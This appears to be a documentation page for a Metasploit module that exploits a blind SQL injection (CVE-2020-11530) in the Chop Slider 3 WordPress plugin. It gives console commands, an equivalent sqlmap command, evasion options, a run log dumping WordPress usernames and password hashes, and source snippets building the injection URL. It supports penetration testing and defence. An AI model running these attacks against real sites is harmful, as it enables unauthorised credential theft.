WordPress ChopSlider3 id SQLi Scanner - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/http/wp_chopslider_id_sqli metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: WordPress ChopSlider3 id SQLi Scanner
Module: auxiliary/scanner/http/wp_chopslider_id_sqli
Source code: modules/auxiliary/scanner/http/wp_chopslider_id_sqli.rb
Disclosure date: 2020-05-12
Last modification time: 2021-12-14 16:40:52 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2020-11530

The iDangero.us Chop Slider 3 WordPress plugin version 3.4 and prior contains a blind SQL injection in the id parameter of the get_script/index.php page. The injection is passed through GET parameters, and thus must be encoded, and magic_quotes is applied at the server.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/scanner/http/wp_chopslider_id_sqli
msf auxiliary(wp_chopslider_id_sqli) > show options
    ... show and set options ...
msf auxiliary(wp_chopslider_id_sqli) > set RHOSTS ip-range
msf auxiliary(wp_chopslider_id_sqli) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(wp_chopslider_id_sqli) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(wp_chopslider_id_sqli) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(wp_chopslider_id_sqli) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


The iDangero.us Chop Slider 3 WordPress plugin 3.4 and prior contains a blind SQL injection in the id parameter of the get_script/index.php page. The injection is passed through GET parameters, and thus must be encoded, and magic_quotes is applied at the server.

The plugin can be downloaded from github

This module slightly replicates sqlmap running as:

sqlmap -u 'http://local.target/wp-content/plugins/chopslider/get_script/index.php?id=1111111111' --level=5 --risk=3 --technique=B

Verification Steps


  1. Install the plugin and activate it
  2. Start msfconsole
  3. Do: use auxiliary/scanner/http/wp_chopslider_id_sqli
  4. Do: set rhosts [ip]
  5. Do: run
  6. You should get a dump of usernames and password hashes.

Options


ACTION: List Users

This action lists COUNT users and password hashes.

COUNT

If Action List Users is selected (default), this is the number of users to enumerate. The larger this list, the more time it will take. Defaults to 1.

Scenarios


iDangero.us Chop Slider 3.4 on Wordpress 5.4.4 running on Ubuntu 20.04.

resource (chopslider.rb)> use auxiliary/scanner/http/wp_chopslider_id_sqli
resource (chopslider.rb)> set rhosts 111.111.1.111
rhosts => 111.111.1.111
resource (chopslider.rb)> set verbose true
verbose => true
resource (chopslider.rb)> set count 3
count => 3
resource (chopslider.rb)> run
[*] Version detected: 3.4
[+] Vulnerable version detected
[*] Enumerating Usernames
[*] {SQLi} Executing (select group_concat(qlJEzvIJY) from (select cast(ifnull(user_login,'') as binary) qlJEzvIJY from wp_users limit 3) DSKc)
[*] {SQLi} Time-based injection: expecting output of length 19
[*] Enumerating Password Hashes
[*] {SQLi} Executing (select group_concat(NtxL) from (select cast(ifnull(user_pass,'') as binary) NtxL from wp_users limit 3) YztNPLK)
[*] {SQLi} Time-based injection: expecting output of length 104
[+] wp_users
========

 user_login  user_pass
 ----------  ---------
 admin       $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0
 admin2      $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/
 editor      $P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/wp_chopslider_id_sqli) > creds
Credentials
===========

host  origin         service  public  private                             realm  private_type        JtR Format
----  ------         -------  ------  -------                             -----  ------------        ----------
      111.111.1.111           editor  $P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1         Nonreplayable hash  phpass
      111.111.1.111           admin2  $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/         Nonreplayable hash  phpass
      111.111.1.111           admin   $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0         Nonreplayable hash  phpass

Go back to menu.

Msfconsole Usage


Here is how the scanner/http/wp_chopslider_id_sqli auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/http/wp_chopslider_id_sqli

msf6 auxiliary(scanner/http/wp_chopslider_id_sqli) > show info

       Name: WordPress ChopSlider3 id SQLi Scanner
     Module: auxiliary/scanner/http/wp_chopslider_id_sqli
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2020-05-12

Provided by:
  h00die
  SunCSR
  Callum Murphy <[email protected]>

Available actions:
  Name        Description
  ----        -----------
  List Users  Queries username, password hash for COUNT users

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  COUNT      1                no        Number of users to enumerate
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The base path to the wordpress application
  THREADS    1                yes       The number of concurrent threads (max one per host)
  VHOST                       no        HTTP server virtual host

Description:
  The iDangero.us Chop Slider 3 WordPress plugin version 3.4 and prior 
  contains a blind SQL injection in the id parameter of the 
  get_script/index.php page. The injection is passed through GET 
  parameters, and thus must be encoded, and magic_quotes is applied at 
  the server.

References:
  https://www.exploit-db.com/exploits/48457
  https://nvd.nist.gov/vuln/detail/CVE-2020-11530
  https://seclists.org/fulldisclosure/2020/May/26

Module Options


This is a complete list of options available in the scanner/http/wp_chopslider_id_sqli auxiliary module:

msf6 auxiliary(scanner/http/wp_chopslider_id_sqli) > show options

Module options (auxiliary/scanner/http/wp_chopslider_id_sqli):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COUNT      1                no        Number of users to enumerate
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host

Auxiliary action:

   Name        Description
   ----        -----------
   List Users  Queries username, password hash for COUNT users

Advanced Options


Here is a complete list of advanced options supported by the scanner/http/wp_chopslider_id_sqli auxiliary module:

msf6 auxiliary(scanner/http/wp_chopslider_id_sqli) > show advanced

Module advanced options (auxiliary/scanner/http/wp_chopslider_id_sqli):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   ShowProgress          true                                                yes       Display progress messages during a scan
   ShowProgressPercent   10                                                  yes       The interval in percent that progress should be shown
   SqliDelay             1.0                                                 no        The delay to sleep on time-based blind SQL injections
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module
   WPCHECK               true                                                yes       Check if the website is a valid WordPress install
   WPCONTENTDIR          wp-content                                          yes       The name of the wp-content directory

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/http/wp_chopslider_id_sqli module can do:

msf6 auxiliary(scanner/http/wp_chopslider_id_sqli) > show actions

Auxiliary actions:

   Name        Description
   ----        -----------
   List Users  Queries username, password hash for COUNT users

Evasion Options


Here is the full list of possible evasion options supported by the scanner/http/wp_chopslider_id_sqli auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/http/wp_chopslider_id_sqli) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Connection failed


Here is a relevant code snippet related to the "Connection failed" error message:

48:	  def check
49:	    res = send_request_raw({
50:	      'method' => 'GET',
51:	      'uri' => target_uri.path
52:	    })
53:	    fail_with Failure::Unreachable, 'Connection failed' unless res
54:	    if res && res.body =~ /idangerous.chopslider-(\d\.\d).css-css/
55:	      v = Rex::Version.new(Regexp.last_match(1))
56:	      print_status "Version detected: #{v}"
57:	      if v <= Rex::Version.new('3.4')
58:	        return Msf::Exploit::CheckCode::Appears

Server not online or not detected as wordpress


Here is a relevant code snippet related to the "Server not online or not detected as wordpress" error message:

61:	    Msf::Exploit::CheckCode::Unknown
62:	  end
63:	
64:	  def run_host(ip)
65:	    unless wordpress_and_online?
66:	      vprint_error('Server not online or not detected as wordpress')
67:	      return
68:	    end
69:	
70:	    # this didn't come with a readme file
71:	    # checkcode = check_plugin_version_from_readme('chopslider', '3.4')

ChopSlider3 version not vulnerable or undetected


Here is a relevant code snippet related to the "ChopSlider3 version not vulnerable or undetected" error message:

69:	
70:	    # this didn't come with a readme file
71:	    # checkcode = check_plugin_version_from_readme('chopslider', '3.4')
72:	
73:	    if check == Msf::Exploit::CheckCode::Unknown
74:	      vprint_error('ChopSlider3 version not vulnerable or undetected')
75:	      return
76:	    else
77:	      print_good('Vulnerable version detected')
78:	    end
79:	

Connection failed


Here is a relevant code snippet related to the "Connection failed" error message:

87:	      payload = Rex::Text.uri_encode(payload)
88:	      res = send_request_raw({
89:	        'method' => 'GET',
90:	        'uri' => "#{normalize_uri(target_uri.path, 'wp-content', 'plugins', 'chopslider', 'get_script', 'index.php')}?id=#{sliderid}%20OR%20#{rand(0..10)}<>#{rand(11..1000)}%20AND%20#{payload}"
91:	      }, 20, true)
92:	      fail_with Failure::Unreachable, 'Connection failed' unless res
93:	    end
94:	
95:	    unless @sqli.test_vulnerable
96:	      print_bad("#{peer} - Testing of SQLi failed.  If this is time based, try increasing SqliDelay.")
97:	      return

<PEER> - Testing of SQLi failed. If this is time based, try increasing SqliDelay.


Here is a relevant code snippet related to the "<PEER> - Testing of SQLi failed. If this is time based, try increasing SqliDelay." error message:

91:	      }, 20, true)
92:	      fail_with Failure::Unreachable, 'Connection failed' unless res
93:	    end
94:	
95:	    unless @sqli.test_vulnerable
96:	      print_bad("#{peer} - Testing of SQLi failed.  If this is time based, try increasing SqliDelay.")
97:	      return
98:	    end
99:	    columns = ['user_login', 'user_pass']
100:	
101:	    print_status('Enumerating Usernames')

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


Version


This page has been produced using Metasploit Framework version 6.1.36-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.